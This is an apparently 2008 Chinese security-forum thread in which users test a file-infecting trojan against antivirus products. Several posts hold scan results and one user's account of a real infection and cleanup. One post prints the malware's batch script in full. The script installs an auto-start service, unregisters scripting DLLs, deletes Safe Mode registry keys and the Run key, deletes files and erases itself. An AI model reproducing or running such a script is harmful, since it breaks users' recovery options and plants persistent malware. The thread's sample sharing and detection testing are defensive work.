好久没有质量这么高的了过全部感染型！！！

hum

天那
我全上报掉算了

zwf2003

这个厉害几乎把我安软文件夹中的安全工具都品尝个遍，幸好有毛豆挡住

黄金马甲出租

qnlydkhkgof
besuujkbcncc
ucygywqolvspz
time 12:00:00
date 2004-08-17
ping 127.0.0.1 -n 3
sc.exe create hfhxsct BinPath= "C:\windows\hfhxsct.exe -win32" type= own type= interact start= auto DisplayName= mywjqweihilr
sc.exe description hfhxsct ixddsvdlsoneelkz
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start hfhxsct
time 20:38:38
date 2008-06-08

del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
del "C:\Documents and Settings\Administrator.SNOOPY-B36AC7C9\桌面\FXPTJKC\FXPTJKC.exe" /F
del %0
exit
ebwgadoqjbt

carlwang

AhnLab-V3 2008.5.30.1 2008.06.05 -
AntiVir 7.8.0.55 2008.06.06 -
Authentium 5.1.0.4 2008.06.08 -
Avast 4.8.1195.0 2008.06.08 -
AVG 7.5.0.516 2008.06.07 -
BitDefender 7.2 2008.06.08 -
CAT-QuickHeal 9.50 2008.06.07 -
ClamAV 0.92.1 2008.06.08 -
DrWeb 4.44.0.09170 2008.06.07 -
eSafe 7.0.15.0 2008.06.05 -
eTrust-Vet 31.6.5855 2008.06.06 -
Ewido 4.0 2008.06.07 -
F-Prot 4.4.4.56 2008.06.08 -
F-Secure 6.70.13260.0 2008.06.07 Trojan-Downloader.Win32.Agent.seb
Fortinet 3.14.0.0 2008.06.07 -
GData 2.0.7306.1023 2008.06.08 Trojan-Downloader.Win32.Agent.seb
Ikarus T3.1.1.26.0 2008.06.08 -
Kaspersky 7.0.0.125 2008.06.08 Trojan-Downloader.Win32.Agent.seb
McAfee 5312 2008.06.06 -
Microsoft 1.3604 2008.06.08 -
NOD32v2 3165 2008.06.06 -
Norman 5.80.02 2008.06.06 -
Panda 9.0.0.4 2008.06.07 -
Prevx1 V2 2008.06.08 -
Rising 20.47.42.00 2008.06.06 -
Sophos 4.30.0 2008.06.08 Mal/Behav-112
Sunbelt 3.0.1145.1 2008.06.05 -
TheHacker 6.2.92.339 2008.06.07 -
VBA32 3.12.6.7 2008.06.07 -
VirusBuster 4.3.26:9 2008.06.07 -
Webwasher-Gateway 6.6.2 2008.06.07 -


这个强的嘛，主流的基本都过了

guanyuanzhi1987

昨天下午实机运行后果然中招，配置是KAV2009+VISTA自带的防火墙，一切都静悄悄的发生了... （在运行病毒的时候VISTA的UAC会问是否允许，也算有点用处吧 ）
直到我发现电驴的图标变成一个面目狰狞的蓝色驴头 ...
所有的EXE文件全部被感染，不过还好KAV没死掉，但是还是静静地，任务管理器打不开，发现在C盘WINDOWS文件夹下会出现三个隐藏的随机字母命名的衍生物，并偷偷的在进行网络连接。
没办法，安全模式手动删掉衍生物，删掉所有的EXE文件（OMG ），卸掉卡巴，下了个微点跟小红伞（原来的安装包均被感染了。。。），果然被微点砍掉，不幸中的万幸啊

zwf2003

楼上节哀

guanyuanzhi1987

晕，早搞定了，节哀啥啊，大过节的。。。

BING126

McAfee  MISS

albatross

所以说，微点是一定要支持DI，就等正式版出来去支持了

冰雀祭司

猛……呵呵，路过。